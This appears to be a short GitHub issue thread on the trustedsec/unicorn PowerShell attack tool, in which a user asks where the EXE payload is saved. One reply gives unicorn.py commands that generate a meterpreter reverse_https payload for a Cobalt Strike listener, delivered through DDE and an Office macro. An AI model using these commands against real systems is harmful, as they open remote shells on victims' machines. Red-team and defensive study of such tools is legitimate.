trustedsec/unicorn

Help where is my EXE payload saved?

Closed this issue · 4 comments

r3x07 commented

i only see .rc and .py nothing else

@deadfishhackers
python unicorn.py windows/meterpreter/reverse_https cobaltstrike 443 dde
unicorn/download.ps1
image

all reverse_https
run download.ps1

python unicorn.py download.ps1 macro 500

cat powershell_attack.txt

"your EXE payload "
use msf generate

There is no executable generated with Unicorn. This is a powershell exploitation framework.

Maybe you can use pyinstaller to
.py > .exe

r3x07 commented